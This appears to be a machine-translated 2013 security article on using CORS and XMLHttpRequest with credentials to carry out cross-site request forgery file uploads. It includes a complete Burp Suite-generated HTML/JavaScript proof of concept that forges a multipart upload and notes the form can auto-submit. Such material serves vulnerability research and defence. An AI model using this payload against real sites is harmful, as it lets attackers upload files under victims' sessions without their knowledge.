Use the csrf vulnerability to upload files-the vulnerability warning-the black bar safety net

2013-11-22T00:00:00
ID MYHACK58:62201341246
Type myhack58
Reporter 佚名
Modified 2013-11-22T00:00:00

Description

Everyone knows that the commonly used csrf to upload a file is not very simple. The problem is that we create a fake form submission data with browser file upload to submit the data a little different. That is the upload request will have a filename parameter:

-----------------------------2 5 6 6 7 2 6 2 9 9 1 7 0 3 5

Content-Disposition: form-data; name="file"; filename="test2.txt"

Content-Type: text/plain

test3

-----------------------------2 5 6 6 7 2 6 2 9 9 1 7 0 3 5

If we create a form, submit the above request is not successfully add the filename parameter, this is because the filename parameter is the file upload input is automatically generated. This prevents the evil hackers csrf Upload File. But since the advent of html5,everything is different.

html5 has a new feature called cross-origin resource sharing(CORS

http://www.w3.org/TR/cors/). In the past,due to the same origin policy impact,the hack is no way through javascript to access the other domain. Consider toXSS

So flood,the same origin policy really is to make our lives more secure. However,the use of html5 cross-origin resource sharing,allows javascript to send the filename property of the legitimate

Cross-domain request. So as long as the user visited a malicious page, no other interaction, you can csrf to upload a file.

The following is a Burp Suite to generate a poc of:

<html>

<!-- CSRF PoC - generated by Burp Suite Professional -->

<body>

<script>

function submitRequest()

{

var xhr = new XMLHttpRequest();

xhr. open("POST", "https://example.com/new_file.html", true);

xhr. setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8");

xhr. setRequestHeader("Accept-Language", "de-de,de;q=0.8,en-us;q=0.5,en;q=0.3");

xhr. setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------2 5 6 6 7 2 6 2 9 9 1 7 0 3 5");

xhr. withCredentials = "true";

var body= "-----------------------------2 5 6 6 7 2 6 2 9 9 1 7 0 3 5\r\n" +

"Content-Disposition: form-data; name=\"message\"\r\n" +

"\r\n" +

"\r\n" +

"-----------------------------2 5 6 6 7 2 6 2 9 9 1 7 0 3 5\r\n" +

"Content-Disposition: form-data; name=\"backPage\"\r\n" +

"\r\n" +

"test\r\n" +

"-----------------------------2 5 6 6 7 2 6 2 9 9 1 7 0 3 5\r\n" +

"Content-Disposition: form-data; name=\"dataType\"\r\n" +

"\r\n" +

"test \r\n" +

"-----------------------------2 5 6 6 7 2 6 2 9 9 1 7 0 3 5\r\n" +

"Content-Disposition: form-data; name=\"file\"; filename=\"test2.txt\"\r\n" +

"Content-Type: text/plain\r\n" +

"\r\n" +

"test3\r\n" +

"-----------------------------2 5 6 6 7 2 6 2 9 9 1 7 0 3 5--\r\n";

var aBody = new Uint8Array(body. length);

for (var i = 0; i < aBody. length; i++)

aBody[i] = body. charCodeAt(i);

xhr. send(new Blob([aBody]));

}

</script>

<form action="#">

<input type="submit" value="Submit request" onclick="submitRequest();" />

</form>

</body>

</html>

Of course, the poc where the Submit button is not required, can be via javascript auto-submit. To some extent this browser the most important of the same-origin policy is broken. It's really sad a thing.

Extended reading:

http://blog.kotowicz.net/2011/05/cross-domain-arbitrary-file-upload.html

http://blog.kotowicz.net/2011/04/how-to-upload-arbitrary-file-contents.html

https://developer.mozilla.org/en-US/docs/HTTP/Access_control_CORS?redirectlocale=en-US&redirectslug=HTTP_access_control

http://www.w3.org/TR/cors/

via: gerionsecurity.com 翻译整理:litdg@FreeBuf